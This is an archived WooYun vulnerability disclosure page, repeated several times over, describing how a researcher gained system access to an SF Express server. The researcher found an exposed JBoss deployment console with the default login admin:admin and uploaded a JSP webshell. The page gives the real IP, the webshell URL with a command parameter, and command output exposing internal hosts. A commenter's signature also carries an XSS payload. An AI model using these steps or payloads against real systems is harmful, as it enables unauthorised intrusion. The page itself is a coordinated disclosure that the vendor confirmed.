顺丰速运某系统配置不当导致可获取系统权限

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-090568

漏洞标题：顺丰速运某系统配置不当导致可获取系统权限

漏洞作者：猪猪侠

提交时间：2015-01-07 21:55

修复时间：2015-02-21 21:56

公开时间：2015-02-21 21:56

漏洞类型：应用配置错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-01-07：细节已通知厂商并且等待厂商处理中
2015-01-08：厂商已经确认，细节仅向厂商公开
2015-01-18：细节向核心白帽子及相关领域专家公开
2015-01-28：细节向普通白帽子公开
2015-02-07：细节向实习白帽子公开
2015-02-21：细节向公众公开

简要描述：

手动找的，弯弯绕绕，这里一点信息，那里一点信息，拼凑出了大问题，所以呢，一定要有耐心

详细说明：

域名：https://sfadp.sf-express.com

#1 https://219.134.187.215
看到一个JBOSS的页面，但是jmx-console，web-console被删除了
但是呢 status (Tomcat status) 没删除，怪我咯？结果把后台又给暴漏了

#2 发现其他路径

#3 这里又是一个弱口令，进入部署后台 admin:admin

漏洞证明：

#4 上传一个部署包，系统权限就到手了

https://219.134.187.215/a/pwn.jsp?cmd=ipconfig%20/all

Windows IP 配置
   主机名  . . . . . . . . . . . . . : sfa-DP
   主 DNS 后缀 . . . . . . . . . . . : 
   节点类型  . . . . . . . . . . . . : 混合
   IP 路由已启用 . . . . . . . . . . : 否
   WINS 代理已启用 . . . . . . . . . : 否
以太网适配器 本地连接:
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   物理地址. . . . . . . . . . . . . : 00-50-56-89-2A-DA
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   本地链接 IPv6 地址. . . . . . . . : fe80::ec8b:8740:2a12:6796%11(首选) 
   IPv4 地址 . . . . . . . . . . . . : 10.0.80.101(首选) 
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 10.0.80.254
   DHCPv6 IAID . . . . . . . . . . . : 234901590
   DHCPv6 客户端 DUID  . . . . . . . : 00-01-00-01-1A-CE-73-CF-00-50-56-89-2A-DA
   DNS 服务器  . . . . . . . . . . . : 10.0.15.2
   TCPIP 上的 NetBIOS  . . . . . . . : 已启用
隧道适配器 isatap.{5F1B9895-B9F6-40A9-8661-C8EAB76E20E2}:
   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft ISATAP Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
隧道适配器 Teredo Tunneling Pseudo-Interface:
   连接特定的 DNS 后缀 . . . . . . . : 
   描述. . . . . . . . . . . . . . . : Microsoft Teredo Tunneling Adapter
   物理地址. . . . . . . . . . . . . : 00-00-00-00-00-00-00-E0
   DHCP 已启用 . . . . . . . . . . . : 否
   自动配置已启用. . . . . . . . . . : 是
   IPv6 地址 . . . . . . . . . . . . : 2001:0:9d38:90d7:3077:c25:f5ff:af9a(首选) 
   本地链接 IPv6 地址. . . . . . . . : fe80::3077:c25:f5ff:af9a%18(首选) 
   默认网关. . . . . . . . . . . . . : ::
   TCPIP 上的 NetBIOS  . . . . . . . : 已禁用

服务器名称            注解
-------------------------------------------------------------------------------
\\AIR-INTERFACE-2                                                              
\\AIR-SITA                                                                     
\\AIR-UMS-APP                                                                  
\\FOC-WEB                                                                      
\\SF-E6433414B3C1                                                              
\\SF-PNS                                                                       
\\SF-PNS-BAK                                                                   
\\SFA-DP                                                                       
\\WIN-DBTH3GQD9VH                                                              
\\WIN-EEQ3AURP80P                                                              
命令成功完成。

修复方案：

# 删除干净

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-01-08 18:32

厂商回复：

非常感谢，已安排研发进行整改。

漏洞评价：

2015-01-07 21:57 | zph ( 普通白帽子 | Rank:235 漏洞数:43 )

前排。猪哥这两天挖了不少洞啊~~
2015-01-07 21:59 | backtrack丶yao ( 普通白帽子 | Rank:290 漏洞数:107 | "><img src=x onerror=alert(666666);> <im...)

前排
2015-01-07 22:00 | JiuShao ( 普通白帽子 | Rank:405 漏洞数:94 | ╮(╯▽╰)╭锄禾日当午)

猪哥这是看集市不限量了啊。
2015-01-07 22:02 | 猪猪侠 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了，还要自由干吗？)

@杀器王子 @lijiejie 给了我很大压力。
2015-01-07 22:06 | JiuShao ( 普通白帽子 | Rank:405 漏洞数:94 | ╮(╯▽╰)╭锄禾日当午)

@猪猪侠你给我们压力更大啊你棒棒糖太多了
2015-01-07 22:18 | MayIKissYou ( 普通白帽子 | Rank:195 漏洞数:33 | 勿忘初心)

这是要不限量的肾六来一打么
2015-01-07 22:36 | nony ( 路人 | Rank:28 漏洞数:13 | Not do is die...)

@猪猪侠我师傅估计要忙活一会了...
2015-01-08 00:14 | pigzhu ( 路人 | Rank:4 漏洞数:4 | 网络共享！)

猪哥，给来个棒棒糖吧
2015-01-08 15:58 | 南宁网警Mx ( 路人 | Rank:8 漏洞数:5 | 我是独行侠。有心交友qq1552673833)

你棒棒糖太多了
2015-01-08 16:39 | 小呆呆 ( 实习白帽子 | Rank:41 漏洞数:7 | 每次有人骂我猪我都说我偶像也是猪)

求棒棒糖
2015-01-09 17:24 | 胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)

@猪猪侠 @杀器王子 @lijiejie 三人血拼，1月最勤奋白帽子啊

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-090568

漏洞标题：顺丰速运某系统配置不当导致可获取系统权限

相关厂商：顺丰速运

漏洞作者：猪猪侠

提交时间：2015-01-07 21:55

修复时间：2015-02-21 21:56

公开时间：2015-02-21 21:56

漏洞类型：应用配置错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-090568

漏洞标题：顺丰速运某系统配置不当导致可获取系统权限

相关厂商：顺丰速运

漏洞作者： 猪猪侠

提交时间：2015-01-07 21:55

修复时间：2015-02-21 21:56

公开时间：2015-02-21 21:56

漏洞类型：应用配置错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-090568"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：猪猪侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源猪猪侠@乌云